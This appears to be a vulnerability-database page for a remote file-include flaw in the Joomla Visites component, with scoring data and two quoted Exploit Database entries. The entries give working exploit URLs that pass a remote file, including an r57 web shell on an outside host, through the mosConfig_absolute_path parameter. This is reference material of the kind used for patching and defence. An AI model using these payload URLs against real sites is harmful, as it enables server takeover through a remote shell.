Related Weaknesses
CWE-ID |
Weakness Name |
Source |
CWE-94 |
Improper Control of Generation of Code ('Code Injection') The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment. |
|
Metrics
Metrics |
Score |
Severity |
CVSS Vector |
Source |
V2 |
7.5 |
|
AV:N/AC:L/Au:N/C:P/I:P/A:P |
nvd@nist.gov |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 31708
Publication date : 2008-04-25 22h00 +00:00
Author : NoGe
EDB Verified : Yes
source: https://www.securityfocus.com/bid/28942/info
The Visites component for Joomla! is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Visites 1.1 RC2 is vulnerable; other versions may also be affected.
http://www.example.com/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=[evilcode]
Exploit Database EDB-ID : 14476
Publication date : 2010-07-25 22h00 +00:00
Author : Li0n-PaL
EDB Verified : Yes
==========================================================
Joomla Component(com_joomla-visites) RFI
===========================================================
Pal-Li0ns Cr3w , HacKTeach LoverzZ
+===================================================================================+
[?]Joomla Component(com_joomla-visites) RFI
+===================================================================================+
[?] My home: [HacKTeach.org & Pal-Li0ns.com ]
[?] For Ask: [F5w@hotmail.com ]
[?] Script: [ joomla ]
[?] home Script [ http://www.joomla.it ]
[?] Language: [ PHP ]
[?] Founder: [ Li0n-PaL ]
[?] Greatz to: [ Pal-Li0n - Red-D3v1L - ShaDow-D3v1L - Cold-z3ro - storm - Mr.NJ -]
===[ Exploit ]===
http://localhost//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=[shell.txt?]
DeMo ~
http://www.site.com//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.site.com/r57.txt?
EnJoY o_O
---------------------------------------------------------
./exit
Products Mentioned
Configuraton 0
Visocrea>>Com_joomla_visites >> Version 1.1
Joomla>>Joomla\! >> Version *
References